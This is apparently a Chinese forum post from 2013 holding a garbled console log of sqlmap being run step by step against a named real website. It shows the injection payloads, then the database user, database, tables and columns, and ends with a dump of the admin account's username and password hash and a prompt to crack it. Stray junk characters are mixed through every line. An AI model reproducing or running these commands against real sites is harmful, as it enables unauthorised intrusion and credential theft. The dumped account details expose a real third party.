D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ i) I- Y. _, j8 c' @+ Cms "Mysql" --current-user /* 注解:获取当前用户名称' h3 O+ l8 `1 q+ M; \# }. k, E9 {0 \
sqlmap/0.9 - automatic SQL injection and database takeover tool
- _ l( T- z& ]$ p$ }: b+ P http://sqlmap.sourceforge.net starting at: 16:53:54
( ?2 i4 x+ |; b[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
4 c7 z- A8 k/ v$ ]2 W! M session file
# w: |, A3 y1 P- ^) m5 {( |9 \[16:53:54] [INFO] resuming injection data from session file) ?; C- w, o; |/ @
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file2 ]/ M2 k. _! \* m
[16:53:54] [INFO] testing connection to the target url
( v K6 S. U5 h8 l' R7 f+ Qsqlmap identified the following injection points with a total of 0 HTTP(s) reque4 o! i8 q6 d: i0 H/ a/ T1 O; l
sts:
# l u. v+ g1 B4 }+ ]/ |" q---
( H: P& X( c# Z! j! {Place: GET0 m3 c: A0 F; ~5 y
Parameter: id, ]+ \% [8 a; h* I& x% x- O
Type: boolean-based blind6 [% I7 ~/ M# a% C: U
Title: AND boolean-based blind - WHERE or HAVING clause
( D5 m6 h+ T& w& p# e7 i Payload: id=276 AND 799=799
& ~' [$ `+ t; n; [ Type: error-based
/ ]2 |: z: d) M W0 w! `, y. W Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' e6 ]1 h; H* T. D% k
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# g8 [) m, D4 g/ ~9 f# n2 i
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
' T8 Y, g$ [4 L5 X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
1 D* P5 Q$ Q% |& P' E Type: UNION query# b5 @+ h: B) u7 X4 x
Title: MySQL UNION query (NULL) - 1 to 10 columns) h5 q8 g. p7 O# j" ]
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ ]3 F B# g3 M0 n3 v: {1 T& `
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
) B+ [+ ^; m/ v/ x2 {$ B9 E1 eCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 E% s+ c4 o: l2 g! R" |! H
Type: AND/OR time-based blind1 @- o: B! I e5 A' A
Title: MySQL > 5.0.11 AND time-based blind
6 a+ P7 ~! T/ a: l1 d/ k Payload: id=276 AND SLEEP(5)* S' K7 }, q* W9 y g) V4 _
---& d1 y7 t! B6 \4 N
[16:53:55] [INFO] the back-end DBMS is MySQL
" z# n1 m$ b0 X9 o9 R2 @( `web server operating system: Windows7 V; r( k* r o5 n
web application technology: Apache 2.2.11, PHP 5.3.0, y' u. O9 {$ { |$ ] R2 ^
back-end DBMS: MySQL 5.0
1 m2 m& s6 V: V' p( C[16:53:55] [INFO] fetching current user
. b9 p! N8 A6 O# P& ~3 bcurrent user: 'root@localhost'
* Z6 }! N4 x7 F1 I[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
. _* |& f) b9 ?. N4 B: rtput\www.wepost.com.hk' shutting down at: 16:53:58
( r4 f | \/ N# r
7 z- f5 e' J- {D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db6 {3 S, V9 ~# s! J/ o& y; {3 ]9 {, f
ms "Mysql" --current-db /*当前数据库5 e0 I4 c0 v( ]- S/ x9 E3 P; ~
sqlmap/0.9 - automatic SQL injection and database takeover tool
. [( A9 l# Z1 |0 I http://sqlmap.sourceforge.net starting at: 16:54:16* o- I; L1 h& ?1 U
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
. U! f! D/ D0 Y) v4 D0 q) I session file
( W7 _' J6 g" U" k/ V& O[16:54:16] [INFO] resuming injection data from session file
0 s0 h1 D' p; R* P[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file% X3 N" ]+ i; U# ?2 z$ b8 u- X
[16:54:16] [INFO] testing connection to the target url. t1 `2 s! B$ ^/ f6 c1 C* h
sqlmap identified the following injection points with a total of 0 HTTP(s) reque. @, D- ]+ I7 ~2 i1 D1 P6 P
sts:
3 B* \5 \9 c" m+ G4 L7 m---* _0 `2 _! z6 t. o+ [0 p4 C
Place: GET% K% R0 y7 T/ H; L1 y- Z; E
Parameter: id' l* b' H% |$ k7 I7 E4 ]9 Y5 k* B
Type: boolean-based blind/ H( G6 j4 ^* L, H4 S$ b E
Title: AND boolean-based blind - WHERE or HAVING clause6 E) v* B, b' {9 ?
Payload: id=276 AND 799=799- C% P" P1 \$ H. r/ I2 G3 {9 D
Type: error-based
* l" l: x6 n; w6 @. ^ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; A2 K9 p+ @! F4 D
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 G/ R2 F7 \% A8 C$ G$ ]; k
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% J! e; `! i0 T/ b6 D- v) s" E
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
I. `% ~3 z3 n8 m6 l/ U9 B Type: UNION query
( T3 A3 D9 A& t; K$ ~+ m0 I9 I Title: MySQL UNION query (NULL) - 1 to 10 columns% w, t+ f; z5 ?
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( D8 e2 t- C; s1 L% j& m5 R(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 H# [8 U$ f' _6 B" E' ^7 N% u7 WCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' e' R8 S/ d7 z* z Type: AND/OR time-based blind
B2 s7 ?% E. b/ R Title: MySQL > 5.0.11 AND time-based blind+ t9 x1 y! O: S
Payload: id=276 AND SLEEP(5)
1 B( G$ g, ]" i+ r1 E---
) Z( w. j$ a Y4 T$ V[16:54:17] [INFO] the back-end DBMS is MySQL* @( ~1 c1 R4 @5 [/ n" b7 C
web server operating system: Windows+ G' b# ?% H- ?" J2 u
web application technology: Apache 2.2.11, PHP 5.3.0
& c5 v6 e7 T w* {6 Z/ Oback-end DBMS: MySQL 5.05 c' O/ O$ w6 m8 k
[16:54:17] [INFO] fetching current database
! A, T! l8 ~( X" h# dcurrent database: 'wepost'+ P0 l) x! T5 b3 a! D8 b
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou6 x' _( M" _9 R$ I6 k
tput\www.wepost.com.hk' shutting down at: 16:54:18
. O7 \( Q. L6 p& oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# d' o- o/ g- _) c% U8 _) {" _ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名6 V) V P+ i" _5 M0 n0 i
sqlmap/0.9 - automatic SQL injection and database takeover tool' K1 j% y: E' W5 q/ f2 u% H8 V
http://sqlmap.sourceforge.net starting at: 16:55:25) w- Z& Q6 ?, G) i
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 L9 J+ H ]& l2 q+ a
session file+ e+ W& W9 U2 H2 |: {# O% ]; @
[16:55:25] [INFO] resuming injection data from session file
& b+ m9 s( `! z. N" f- C[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file8 J2 y+ I+ H" b$ }: R v4 r
[16:55:25] [INFO] testing connection to the target url. u, a0 k. I: H5 g
sqlmap identified the following injection points with a total of 0 HTTP(s) reque6 a% P- `' X& O
sts:
( `+ P0 n4 I. t U8 ^! [; T5 w0 d# \---" g. r1 M' [4 I, e% }# Z
Place: GET
$ g4 k$ E. _0 F+ g" a' r4 {) PParameter: id0 H3 H; ]0 h4 T9 j" K& i
Type: boolean-based blind5 ?8 G2 _3 r/ U5 F
Title: AND boolean-based blind - WHERE or HAVING clause
8 p/ }' X8 m! V* h' h Payload: id=276 AND 799=7995 r* d. b; T0 z0 A& A# a( i( v+ h6 k
Type: error-based
% M. Q9 o0 U: ~9 V Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause% ^* G8 A; p1 x9 P
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ D3 R" L0 ^' m, A120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' L$ }+ Q& c) H
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): a8 e1 T b5 o a
Type: UNION query" I$ b, R" p$ d2 M5 q4 c, n
Title: MySQL UNION query (NULL) - 1 to 10 columns
+ }5 A" E3 q G/ i0 [# I" ^7 c Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
$ B s _0 j& D, ~$ J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% e5 C% M7 D' D7 `# P+ Q# |
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#* @1 H; a4 h" o6 w
Type: AND/OR time-based blind
& {6 `; B3 E3 g6 `4 O) {' E; d6 r Title: MySQL > 5.0.11 AND time-based blind
+ Q5 S4 M' q* J. T, G Payload: id=276 AND SLEEP(5)
- j& x' r. s% [: m2 w) ^0 b' D* {( v4 S---9 _, p4 q: n4 |7 U
[16:55:26] [INFO] the back-end DBMS is MySQL
T ?6 \4 r9 @, b3 Tweb server operating system: Windows, b( C: z& i: [8 N
web application technology: Apache 2.2.11, PHP 5.3.0
8 ~! a; \6 J* M6 kback-end DBMS: MySQL 5.0
2 \- d1 z$ v+ A1 k3 K[16:55:26] [INFO] fetching tables for database 'wepost'
8 M. N4 o% J' `3 A' J; [ v0 Y4 y[16:55:27] [INFO] the SQL query used returns 6 entries" ?9 ^1 w1 E3 o
Database: wepost7 k3 S* Q0 O( R: d' l. q# p
[6 tables]( t4 f; s& }0 { D+ r- X; z% `
+-------------+
/ Y! _* o9 E" G0 \' n+ e& B| admin |1 R( M1 o% r" c" c0 X& k
| article |
& A: E. o% Y& L/ b| contributor |; K- d% T5 V( [5 N. P. p! n P, V
| idea |( q* L; J3 X3 M: h) K, @0 L5 j
| image |
3 S0 R/ V! N0 T; J) D| issue |. W( K3 U, Y( o. G6 k4 F- |
+-------------+3 G k: U" s3 y9 d- A: [
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou9 h0 f/ \3 J) H* j3 L( `# K# l
tput\www.wepost.com.hk' shutting down at: 16:55:33
/ g+ ^% T7 v0 Q9 A& q2 s% {. N4 y2 e5 v3 T* j3 k' Y T
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, X$ i( T1 j7 E( ?; S. u! c
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
. i2 `4 a ]1 q& w8 p$ l! E3 w sqlmap/0.9 - automatic SQL injection and database takeover tool
# _8 A5 R( r( |* v1 q http://sqlmap.sourceforge.net starting at: 16:56:06
( X3 I% I+ c( W9 Y6 t6 p, Usqlmap identified the following injection points with a total of 0 HTTP(s) reque& k- r; m" O+ `' K7 n
sts:
+ R. g( I* |1 Q0 A* t' W---
, D1 e% t" {: d7 C3 n0 Y! \- dPlace: GET0 N+ e# R& ~3 r. r* p6 w, R
Parameter: id6 o4 T* x; o% d% v, ]6 B/ ]
Type: boolean-based blind" G4 i. y1 t- Q2 r2 d3 ]5 j4 R. A
Title: AND boolean-based blind - WHERE or HAVING clause
8 M/ o# M) C; h# ~: U4 `9 g Payload: id=276 AND 799=799
" O( {' N0 y5 F* W( T8 ?; @ Type: error-based
# U* l" `+ _- }6 Y# g$ s Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
' s: C K3 P0 s2 ~: b Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
* C9 e( R7 _5 {0 i; B) L120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! p/ r ]$ T6 @- ?8 @0 P
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- T- Q4 R! S$ ~ r9 c, H* D8 }3 q
Type: UNION query7 f- o, C2 a- T
Title: MySQL UNION query (NULL) - 1 to 10 columns
0 H' j) l4 ^- ?2 S Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- b2 @, @% K6 `
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 Y5 [. `/ d5 e0 T, m8 D- g/ f
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
( {. Q4 i! f( b3 C" ^, I Type: AND/OR time-based blind
; A( o' K J7 q Title: MySQL > 5.0.11 AND time-based blind
: P$ x4 x( ?" a6 S) U Payload: id=276 AND SLEEP(5)+ i) a/ @" N) W0 l
---
. ~; ~- K) T6 U' yweb server operating system: Windows) X/ u. U& C4 A- d+ G' Y- W& u
web application technology: Apache 2.2.11, PHP 5.3.0
' h3 h2 G6 j A& }) Dback-end DBMS: MySQL 5.0
A9 w5 h+ I/ t" G' l6 G[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se4 H& b6 i' @0 o, M, W9 s+ @
ssion': wepost, wepost
" Z$ l2 d7 V( H0 v& x, ^Database: wepost
5 f6 t' A7 D. k8 |* u ZTable: admin Z9 ^. w: }0 s; e! |8 r, h! t
[4 columns]
4 x- O* G( M& L6 w2 }+----------+-------------+
/ C0 c! O! k0 M; \| Column | Type |2 a L- Z- P: V8 y$ [% K
+----------+-------------+
4 e$ G7 c4 |1 A* s8 G- V- l| id | int(11) |
" j3 d: ^! l6 [| password | varchar(32) |% O; m" g( i* h. x$ |$ R/ p
| type | varchar(10) |& s- L6 D7 ?# G" `! E6 b1 w
| userid | varchar(20) |# _* H8 J2 H4 a* |0 ~! v9 E
+----------+-------------+
" c$ N0 d4 j" ^7 {. Y1 I shutting down at: 16:56:19) K: ~# C3 a; T/ D, L) d
7 q$ x8 q% ]$ \: K. J, q
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- k6 p8 E5 e0 O6 H0 N
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容6 G6 r4 s) u5 R6 R
sqlmap/0.9 - automatic SQL injection and database takeover tool
) _& z2 y8 F9 f6 P3 s' y8 s0 L' V http://sqlmap.sourceforge.net starting at: 16:57:14
$ L9 S# ?$ g0 S% }sqlmap identified the following injection points with a total of 0 HTTP(s) reque0 G; H( L f0 s# V
sts:
( K, Y$ ^' M% ?0 [5 t+ [---
1 l/ N( G2 O: G j# m: s+ tPlace: GET
, N. K) v. W& fParameter: id
7 S0 d9 {1 X8 p, ~! n. K Type: boolean-based blind+ q, f6 s" w/ c- v! _
Title: AND boolean-based blind - WHERE or HAVING clause
: \3 S& r$ O+ S3 D9 R0 L Payload: id=276 AND 799=7992 L. c- u2 u3 D* R$ j8 x: I8 Y
Type: error-based
3 B" b( @7 T ]" c6 t Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. ?4 m1 G" S+ ^
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; c6 @# T- m4 Y; N
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 Q I$ ~5 @, \* W; z- @7 H6 S1 i
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
2 k& z, y! R, E) ?7 E' e Type: UNION query& E2 T* i% g# r- V; A. y2 G
Title: MySQL UNION query (NULL) - 1 to 10 columns! k) L% m3 b& [# `
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# S U; W2 \# \: h- i
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ W! g) J. E# f1 H2 B7 c7 L1 s
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
7 Z* m ?# i0 _$ d6 E* G Type: AND/OR time-based blind8 k, a6 A4 L+ j+ G6 f8 M' `/ j/ G
Title: MySQL > 5.0.11 AND time-based blind
z8 X8 s/ [, ?; v4 b Payload: id=276 AND SLEEP(5)
8 Z) x& w+ G: G( E) \---, x% E: L# J% ]7 r/ h! D( b) m( x
web server operating system: Windows4 y: _5 d1 ^# X: `% p. ~% `; ^0 N
web application technology: Apache 2.2.11, PHP 5.3.0
" k- W9 C) ?' t! xback-end DBMS: MySQL 5.0
. r" `# n- M hrecognized possible password hash values. do you want to use dictionary attack o0 e }" P7 v7 N$ o
n retrieved table items? [Y/n/q] y
! f" \$ |: O9 S3 @( ?4 C8 q, nwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]( }* ~: z8 P: u7 }
do you want to use common password suffixes? (slow!) [y/N] y' {- ^( j X. {3 J7 l ]; \' V5 Z
Database: wepost
; C, y/ R- s* h( XTable: admin
4 {# O( S7 H0 D[1 entry]
9 h+ t( Y/ b3 p; q: D4 w" d+ B+----------------------------------+------------+
9 Z( K! Y: j: J0 U6 V5 }) Z% {| password | userid |
4 Y8 n" x/ m2 S& |0 R; K0 y3 n5 k+----------------------------------+------------+( L1 T% U! m; L8 a" x r
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 | f' L4 y$ P6 x5 g6 O" ` k
+----------------------------------+------------+7 Y/ Y* y4 e, A+ W5 G& O& \
shutting down at: 16:58:14
+ b" N' ~+ \# Y0 ^- [% i, `+ ]! C9 N; K+ P6 y, j8 T
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对